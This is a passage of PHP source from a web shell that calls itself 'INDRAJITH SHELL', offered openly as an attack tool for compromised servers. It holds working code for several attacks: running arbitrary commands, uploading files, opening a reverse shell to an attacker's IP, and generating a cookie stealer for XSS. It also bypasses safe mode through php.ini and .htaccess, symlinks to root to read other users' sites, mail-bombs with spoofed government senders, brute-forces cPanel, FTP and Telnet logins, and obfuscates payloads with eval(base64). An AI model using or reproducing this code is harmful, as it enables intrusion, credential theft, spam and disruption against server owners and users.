  700.     else if(function_exists('exec'))
  701.     {
  702.         exec($cmd,$res);
  703.         $res=join("\n",$res);
  704.     }
  705.     else if(function_exists('system'))
  706.     {
  707.         ob_start();
  708.         system($cmd);
  709.         $res = ob_get_contents();
  710.         ob_end_clean();  
  711.     }
  712.     elseif(function_exists('passthru'))
  713.     {
  714.     ob_start();
  715.     passthru($cmd);
  716.     $res=ob_get_contents();
  717.     ob_end_clean();
  718.     }
  719.     else if(function_exists('proc_open'))
  720.     {
  721.         $descriptorspec = array(0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w"));
  722.         $handle = proc_open($cmd ,$descriptorspec , $pipes);
  723.         if(is_resource($handle))
  724.         {
  725.             if(function_exists('fread') && function_exists('feof'))
  726.             {
  727.                 while(!feof($pipes[1]))
  728.                 {
  729.                     $res .= fread($pipes[1], 512);
  730.                 }
  731.             }
  732.             else if(function_exists('fgets') && function_exists('feof'))
  733.             {
  734.                 while(!feof($pipes[1]))
  735.                 {
  736.                     $res .= fgets($pipes[1],512);
  737.                 }
  738.             }
  739.         }
  740.         pclose($handle);
  741.     }
  742.    
  743.     else if(function_exists('popen'))
  744.     {
  745.         $handle = popen($cmd , "r");
  746.         if(is_resource($handle))
  747.         {
  748.             if(function_exists('fread') && function_exists('feof'))
  749.             {
  750.                 while(!feof($handle))
  751.                 {
  752.                     $res .= fread($handle, 512);
  753.                 }
  754.             }
  755.             else if(function_exists('fgets') && function_exists('feof'))
  756.             {
  757.                 while(!feof($handle))
  758.                 {
  759.                     $res .= fgets($handle,512);
  760.                 }
  761.             }
  762.         }
  763.         pclose($handle);
  764.     }
  765.    
  766.     $res=wordwrap(htmlspecialchars($res));
  767.     if($_GET['cmdexe'])
  768.     {
  769.         echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>";
  770.     }
  771.     return $res;
  772. }
  773. function upload_file()
  774. {
  775.     chdir($_POST['path']);
  776.     if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name']))
  777.     {
  778.         alert("Uploaded File Successfully");
  779.     }
  780.     else
  781.     {
  782.         alert("Access Denied!!!");
  783.     }
  784. }
  785.  
  786. function reverse_conn_ui()
  787. {
  788.     global $your_ip;
  789.     echo "<div id='result'>
  790.          <center><h2>Reverse Shell</h2><hr />
  791.          <br /><br /><form method='GET'><table class=tbl>
  792.          <tr>
  793.          <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>
  794.                      <option>PHP Reverse Shell</option>
  795.          </select></td></tr><tr>
  796.          <td>Your IP : <input name='my_ip' value=".$your_ip.">
  797.          PORT : <input name='my_port' value='560'>
  798.          <input type='submit' value='   >>   ' /></td></tr></form>
  799.          <tr></tr>
  800.          <tr><td><font color=red>PHP Reverse Shell</font>:<font color=green> nc -l -p <i>port</i></font></td></tr></table> </div>";
  801. }
  802. function reverse_conn_bg()
  803. {
  804.     global $os;
  805.     $option=$_REQUEST['rev_option'];
  806.     $ip=$_GET['my_ip'];
  807.     $port=$_GET['my_port'];
  808.     if($option=="PHP Reverse Shell")
  809.     {
  810.         echo "<div id=result><h2>RESULT</h2><hr /><br />";
  811.         function printit ($string)
  812.         {
  813.             if (!$daemon)
  814.             {
  815.         print "$string\n";
  816.             }
  817.         }
  818.         $chunk_size = 1400;
  819.         $write_a = null;
  820.         $error_a = null;
  821.         $shell = 'uname -a; w; id; /bin/sh -i';
  822.         $daemon = 0;
  823.         $debug = 0;
  824.         if (function_exists('pcntl_fork'))
  825.         {
  826.             $pid = pcntl_fork();
  827.             if ($pid == -1)
  828.             {
  829.         printit("ERROR: Can't fork");
  830.         exit(1);
  831.             }
  832.             if ($pid)
  833.             {
  834.         exit(0);
  835.             }
  836.             if (posix_setsid() == -1)
  837.             {
  838.         printit("Error: Can't setsid()");
  839.         exit(1);
  840.             }
  841.             $daemon = 1;
  842.         }
  843.         else
  844.         {
  845.             printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  846.         }
  847.         chdir("/");
  848.         umask(0);
  849.         $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  850.         if (!$sock)
  851.         {
  852.             printit("$errstr ($errno)");
  853.             exit(1);
  854.         }
  855.         $descriptorspec = array(0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w"));
  856.         $process = proc_open($shell, $descriptorspec, $pipes);
  857.         if (!is_resource($process))
  858.         {
  859.             printit("ERROR: Can't spawn shell");
  860.             exit(1);
  861.         }
  862.         stream_set_blocking($pipes[0], 0);
  863.         stream_set_blocking($pipes[1], 0);
  864.         stream_set_blocking($pipes[2], 0);
  865.         stream_set_blocking($sock, 0);
  866.         printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>");
  867.         while (1)
  868.         {
  869.             if (feof($sock))
  870.             {
  871.         printit("ERROR: Shell connection terminated");
  872.         break;
  873.             }
  874.             if (feof($pipes[1]))
  875.             {
  876.         printit("ERROR: Shell process terminated");
  877.         break;
  878.             }
  879.             $read_a = array($sock, $pipes[1], $pipes[2]);
  880.             $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  881.             if (in_array($sock, $read_a))
  882.             {
  883.         if ($debug) printit("SOCK READ");
  884.         $input = fread($sock, $chunk_size);
  885.         if ($debug) printit("SOCK: $input");
  886.         fwrite($pipes[0], $input);
  887.             }
  888.             if (in_array($pipes[1], $read_a))
  889.             {
  890.         if ($debug) printit("STDOUT READ");
  891.         $input = fread($pipes[1], $chunk_size);
  892.         if ($debug) printit("STDOUT: $input");
  893.         fwrite($sock, $input);
  894.             }
  895.             if (in_array($pipes[2], $read_a))
  896.             {
  897.         if ($debug) printit("STDERR READ");
  898.         $input = fread($pipes[2], $chunk_size);
  899.         if ($debug) printit("STDERR: $input");
  900.         fwrite($sock, $input);
  901.             }
  902.         }
  903.         fclose($sock);
  904.         fclose($pipes[0]);
  905.         fclose($pipes[1]);
  906.         fclose($pipes[2]);
  907.         proc_close($process);
  908.         echo "<br /><br /><hr /><br /><br /></div>";
  909.     }
  910. }
  911.  
  912. function cookie_jack()
  913. {
  914.     global $cookie_highjacker;
  915.     echo "<div id=result><center><h2>NOTICE</h2><hr/>";
  916.     if(function_exists('fopen') && function_exists('fwrite'))
  917.     {
  918.         $cook=gzinflate(base64_decode($cookie_highjacker));
  919.         $han_le=fopen("jith_cookie.php", "w+");
  920.         if($han_le)
  921.         {
  922.             fwrite($han_le, $cook);
  923.             echo "Yes... Cookie highjacker is generated.<br /> Name : <font color=green>jith_cookie.php</font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is useable in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
  924.         }
  925.         else
  926.         {
  927.             echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
  928.         }
  929.     }
  930. }
  931.  
  932.  
  933.  
  934. function safe_mode_fuck()
  935. {
  936.     global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php;
  937.     $path = chdir($_GET['path']);
  938.     chdir($_GET['path']);
  939.     switch($_GET['safe_mode'])
  940.     {
  941.         case "s_php_ini":
  942.             $s_file=$s_php_ini;
  943.             $s_name="php.ini";
  944.             break;
  945.         case "s_htaccess":
  946.             $s_name=".htaccess";
  947.             $s_file=$s_htaccess;
  948.             break;
  949.         case "s_htaccess_pl":
  950.             $s_name=".htaccess";
  951.             $s_file=$s_htaccess_pl;
  952.             break;
  953.         case "s_ini_php":
  954.             $s_name="ini.php";
  955.             $s_file=$ini_php;
  956.            
  957.     }
  958.     if(function_exists('fopen')&& function_exists('fwrite'))
  959.     {
  960.         $s_handle=fopen("$s_name", "a+");
  961.         if($s_handle)
  962.         {
  963.             fwrite($s_handle, $s_file);
  964.             alert("Operation Succeed!!!");
  965.         }
  966.         else
  967.         {
  968.             alert("Access Denied!!!");
  969.         }
  970.         fclose($s_handle);
  971.     }
  972. }
  973. function safe_mode_fuck_ui()
  974. {
  975.     global $path;
  976.     $path=getcwd();
  977.     echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />
  978.    <table class=tbl size=10><tr><td><a href=?path={$path}&amp;safe_mode=s_php_ini>PHP.INI</a></td><td><a href=??path={$path}&amp;safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=??path={$path}&amp;safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&amp;safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
  979. }
  980. function AccessDenied()
  981. {
  982.     global $path, $forbid_dir;
  983.     $path=$_GET['path'];
  984.     chdir($path);
  985.     if(function_exists('fopen') && function_exists('fwrite'))
  986.     {
  987.         $forbid=fopen(".htaccess", "wb");
  988.         if($forbid)
  989.         {
  990.             fwrite($forbid, $forbid_dir);
  991.             alert("Opreation Succeeded");
  992.         }
  993.         else
  994.         {
  995.             alert("Access Denied");
  996.         }
  997.         fclose($forbid);
  998.     }
  999. }
  1000.  
  1001.  
  1002.  
  1003. function sym_link()
  1004. {
  1005.     cmd('rm -rf AKP');
  1006.     mkdir('AKP', 0777);
  1007.     $usrd = array();
  1008.     $akps = @implode(@file("/etc/named.conf"));
  1009.     if(!$file)
  1010.     {
  1011.         echo("<div id=result><center><h2>Not Found</h2><hr /><font color=red>Sorry, bind file </font>( <font color=green>/etc/named.conf</font> )<font color=red> Not Found</font><br /><br /><hr /><br /><br />");  
  1012.     }
  1013.     else
  1014.     {
  1015.         $htaccess=@fopen('AKP/.htaccess', 'w');
  1016.         fwrite($htaccess,$sym_htaccess);
  1017.         $php_ini_x=fopen('AKP/php.ini', 'w');
  1018.         fwrite($php_ini_x, $sym_php_ini);
  1019.         symlink("/", "AKP/root");
  1020.         echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
  1021.         foreach($akps as $akp)
  1022.         {
  1023.             if(eregi("zone", $akp))
  1024.             {
  1025.                 preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1026.                 flush();
  1027.                 if(strlen(trim($akpzz[1][0]))>2)
  1028.                 {
  1029.                     $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1030.                     echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href=/AKP/root/home/".$user['name']."/public_html/ target=_blank>SymLink</a></td></tr></table>";
  1031.                     flush();
  1032.                 }
  1033.             }
  1034.         }
  1035.     }
  1036. }
  1037.  
  1038. function php_ende_ui()
  1039. {
  1040.     echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>
  1041.    <tr><td>
  1042.    Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
  1043.    </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE
  1044.  
  1045. For Encode Input your full source code.
  1046.  
  1047. For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value='   >>   ' /><br /><hr /><br /><br /></form></div>";
  1048. }
  1049. function php_ende_bg()
  1050. {
  1051.     $meth_d=$_POST['typed'];
  1052.     $typ_d=$_POST['typenc'];
  1053.     $c_ntent=$_POST['php_content'];
  1054.     $c_ntent=$c_ntent;
  1055.     switch($meth_d)
  1056.     {
  1057.         case "Encode":
  1058.             switch($typ_d)
  1059.             {
  1060.                 case "GZINFLATE":
  1061.                     $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1062.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  1063.                     break;
  1064.                 case "GZUNCOMPRESS":
  1065.                     $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1066.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  1067.                     break;
  1068.                 case "STR_ROT13":
  1069.                     $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
  1070.                     $res_t=base64_encode(str_rot13($res_t));
  1071.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  1072.                     break;                  
  1073.             }
  1074.         break;
  1075.         case "Decode":
  1076.             switch($typ_d)
  1077.             {
  1078.                 case "GZINFLATE":
  1079.                     $res_t=gzinflate(base64_decode($c_ntent));
  1080.                     break;
  1081.                 case "GZUNCOMPRESS":
  1082.                     $res_t=gzuncompress(base64_decode($c_ntent));
  1083.                     break;
  1084.                 case "STR_ROT13":
  1085.                     $res_t=str_rot13(base64_decode($c_ntent));
  1086.                     break;                  
  1087.             }
  1088.         break;
  1089.     }
  1090.     echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
  1091. }
  1092.  
  1093. function massmailer_ui()
  1094. {
  1095.     echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr  style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr  style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value='   >>   '></td></tr></form></table></td>
  1096.    <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing  E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value='   >>   '></td></tr></form></table>   </td></tr></table>";
  1097. }
  1098.  
  1099. function massmailer_bg()
  1100. {
  1101.     $from=$_POST['from'];
  1102.     $to=$_POST['to_mail'];
  1103.     $subject=$_POST['subject_mail'];
  1104.     $message=$_POST['mail_content'];
  1105.     if(function_exists('mail'))
  1106.     {
  1107.         if(mail($to,$subject,$message,"From:$from"))
  1108.         {
  1109.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
  1110.         }
  1111.         else
  1112.         {
  1113.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1114.         }
  1115.     }
  1116.     else
  1117.     {
  1118.         echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1119.     }
  1120. }
  1121.  
  1122. function mailbomb_bg()
  1123. {
  1124.     $rand=rand(0, 9999999);
  1125.     $to=$_POST['bomb_to'];
  1126.     $from="president_$rand@whitewhitehouse.gov";
  1127.     $subject=$_POST['bomb_subject']." ID ".$rand;
  1128.     $times=$_POST['bomb_no'];
  1129.     $content=$_POST['bmail_content'];
  1130.     if($times=='')
  1131.     {
  1132.         $times=1000;
  1133.     }
  1134.     while($times--)
  1135.     {
  1136.         if(function_exists('mail'))
  1137.         {
  1138.             if(mail($to,$subject,$message,"From:$from"))
  1139.             {
  1140.                 echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
  1141.             }
  1142.             else
  1143.             {
  1144.                 echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1145.             }
  1146.         }
  1147.         else
  1148.         {
  1149.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1150.         }
  1151.     }
  1152. }
  1153.  
  1154.  
  1155. /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
  1156. /*------------------------ Credit Goes to Them ---------------------------------*/
  1157. function cpanel_check($host,$user,$pass,$timeout)
  1158. {
  1159.     set_time_limit(0);
  1160.     global $cpanel_port;
  1161.     $ch = curl_init();
  1162.     curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  1163.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1164.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1165.     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1166.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1167.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1168.     $data = curl_exec($ch);
  1169.     if ( curl_errno($ch) == 28 )
  1170.     {
  1171.         print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
  1172.         exit;
  1173.     }
  1174.     else if (curl_errno($ch) == 0 )
  1175.     {
  1176.         print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\"   style=\"font-size: 9pt\"><b><font color=\"green\">
  1177.        Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  1178.     }
  1179.     curl_close($ch);
  1180. }
  1181.  
  1182. function cpanel_crack()
  1183. {
  1184.     set_time_limit(0);
  1185.     global $os;
  1186.     echo "<div id=result>";
  1187.     $cpanel_port="2082";
  1188.         $connect_timeout=5;
  1189.         if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
  1190.         {
  1191.         ?>
  1192.         <center>
  1193.         <form method=post>
  1194.         <table class=tbl>
  1195.             <tr>
  1196.                 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
  1197.             </tr>
  1198.             <tr>
  1199.                 <td align=center>User names</td><td align=center>Password</td>
  1200.             </tr>
  1201.             <tr>
  1202.                 <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
  1203.                 if($os != "win")
  1204.                 {
  1205.                     if(@file('/etc/passwd'))
  1206.                     {
  1207.                         $users = file('/etc/passwd');
  1208.                         foreach($users as $user)
  1209.                         {
  1210.                             $user = explode(':', $user);
  1211.                             echo $user[0] . "\n";
  1212.                         }
  1213.                     }
  1214.                     else
  1215.                     {
  1216.                         $temp = "";
  1217.                         $val1 = 0;
  1218.                         $val2 = 1000;
  1219.                         for(;$val1 <= $val2;$val1++)
  1220.                         {
  1221.                             $uid = @posix_getpwuid($val1);
  1222.                             if ($uid)
  1223.                                  $temp .= join(':',$uid)."\n";
  1224.                          }
  1225.                        
  1226.                          $temp = trim($temp);
  1227.                              
  1228.                          if($file5 = fopen("test.txt","w"))
  1229.                          {
  1230.                             fputs($file5,$temp);
  1231.                              fclose($file5);
  1232.                              
  1233.                              $file = fopen("test.txt", "r");
  1234.                              while(!feof($file))
  1235.                              {
  1236.                                 $s = fgets($file);
  1237.                                 $matches = array();
  1238.                                 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1239.                                 $matches = str_replace("home/","",$matches[1]);
  1240.                                 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1241.                                     continue;
  1242.                                 echo $matches;
  1243.                             }
  1244.                             fclose($file);
  1245.                         }
  1246.                     }
  1247.                 }
  1248.                  ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
  1249.             </tr>
  1250.             <tr>
  1251.                 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
  1252.             </tr>
  1253.             <tr>
  1254.                 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
  1255.             </tr>
  1256.             <tr>
  1257.                 <td align=center colspan=2><input type="submit" value="   Go    " class=but></td>
  1258.             </tr>
  1259.         </table>
  1260.         </form>
  1261.         </center>
  1262.         <?php
  1263.         }
  1264.         else
  1265.         {
  1266.             if(empty($_POST['username']) || empty($_POST['password']))
  1267.                 echo "<center>Please Enter The Users or Password List</center>";
  1268.             else
  1269.             {
  1270.                 $userlist=explode("\n",$_POST['username']);
  1271.                 $passlist=explode("\n",$_POST['password']);
  1272.    
  1273.                 if($_POST['cracktype'] == "ftp")
  1274.                 {
  1275.                     foreach ($userlist as $user)
  1276.                     {
  1277.                         $pureuser = trim($user);
  1278.                         foreach ($passlist as $password )
  1279.                         {
  1280.                             $purepass = trim($password);
  1281.                             ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1282.                         }
  1283.                     }
  1284.                 }
  1285.                 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
  1286.                 {
  1287.                     if($cracktype == "telnet")
  1288.                     {
  1289.                         $cpanel_port="23";
  1290.                     }
  1291.                     else
  1292.                         $cpanel_port="2082";
  1293.                     foreach ($userlist as $user)
  1294.                     {
  1295.                         $pureuser = trim($user);
  1296.                         echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
  1297.                         Processing user $pureuser ...</font></b><br><br>";
  1298.                         foreach ($passlist as $password )
  1299.                         {
  1300.                             $purepass = trim($password);
  1301.                             cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1302.                         }
  1303.                     }
  1304.                 }
  1305.             }
  1306.         }
  1307.                
  1308.     echo "</div>";
  1309. }
  1310.  
  1311. function get_users()
  1312. {
  1313.     $userz = array();
  1314.     $user = file("/etc/passwd");
  1315.     foreach($user as $userx=>$usersz)
  1316.     {
  1317.             $userct = explode(":",$usersz);
  1318.             array_push($userz,$userct[0]);
  1319.     }
  1320.     if(!$user)
  1321.     {
  1322.         if($opd = opendir("/home/"))
  1323.         {
  1324.             while(($file = readdir($opd))!== false)
  1325.             {
  1326.                 array_push($userz,$file);
  1327.             }
  1328.         }
  1329.         closedir($opd);
  1330.     }
  1331.     $userz=implode(', ',$userz);
  1332.     return $userz;
  1333. }
  1334.  
  1335. function exploit_details()
  1336. {
  1337.     global $os;
  1338.     echo "<div id=result style='color:green;'><center>
  1339.    <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>
  1340.    OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
  1341.    <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
  1342.    <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr>
  1343.    <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td>
  1344.    <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr>
  1345.    <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>";
  1346.     if(function_exists('apache_get_modules'))
  1347.     {
  1348.     echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
  1349.         echo implode(', ', apache_get_modules());
  1350.         echo "</font></tr></td>";
  1351.     }
  1352.     if($os=='win')
  1353.     {
  1354.         echo  "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr>
  1355.               <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr>
  1356.               ";
  1357.     }
  1358.     if($os=='nix')
  1359.     {
  1360.         echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr>
  1361.              <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr>
  1362.              <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr>
  1363.              <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr>
  1364.              <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr>
  1365.              <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr>
  1366.              <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr>
  1367.              <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
  1368.              <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr>
  1369.              <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>";
  1370.               $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  1371.               $uze=array();
  1372.               foreach($useful as $uzeful)
  1373.               {
  1374.                 if(cmd("which $uzeful"))
  1375.                 {
  1376.                     $uze[]=$uzeful;
  1377.                 }
  1378.               }
  1379.               echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
  1380.               echo implode(', ',$uze);
  1381.               echo "</pre></td></tr>";
  1382.               $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1383.               $uze=array();
  1384.               foreach($downloaders as $downloader)
  1385.               {
  1386.                 if(cmd("which $downloader"))
  1387.                 {
  1388.                     $uze[]=$downloader;
  1389.                 }
  1390.               }
  1391.               echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
  1392.               echo implode(', ',$uze);
  1393.               echo "</pre></td></tr>";
  1394.               echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr>
  1395.                    <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
  1396.     }
  1397.     echo "</table><br /><br /><hr /><br /><br />";
  1398. }
  1399.  
  1400. function remote_file_check_ui()
  1401. {
  1402.     echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />
  1403.          <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>
  1404.          <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php
  1405. ajithkp560.php
  1406. index.html
  1407. profile.php
  1408. c99.php
  1409. r57.php</textarea></td></tr>
  1410.         <tr><td><br /><input type='submit' value='   >>   ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1411. }
  1412.  
  1413. function remote_file_check_bg()
  1414. {
  1415.     set_time_limit(0);
  1416.     $rtr=array();
  1417.     echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
  1418.     $webz=$_POST['rem_web'];
  1419.     $uri_in=$_POST['tryzzz'];
  1420.     $r_xuri = trim($uri_in);
  1421.     $r_xuri=explode("\n", $r_xuri);
  1422.     foreach($r_xuri as $rty)
  1423.     {
  1424.          $urlzzx=$webz.$rty;
  1425.          if(function_exists('curl_init'))
  1426.          {
  1427.             echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1428.             $ch = curl_init($urlzzx);
  1429.             curl_setopt($ch, CURLOPT_NOBODY, true);
  1430.             curl_exec($ch);
  1431.             $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1432.             curl_close($ch);
  1433.             if($status_code==200)
  1434.             {
  1435.                 echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1436.             }
  1437.             else
  1438.             {
  1439.                 echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1440.             }
  1441.          }
  1442.          else
  1443.          {
  1444.             echo "<font color=red>cURL Not Found</font>";
  1445.         }
  1446.     }
  1447.     echo "</table><br /><br /><hr /><br /><br /></div>";
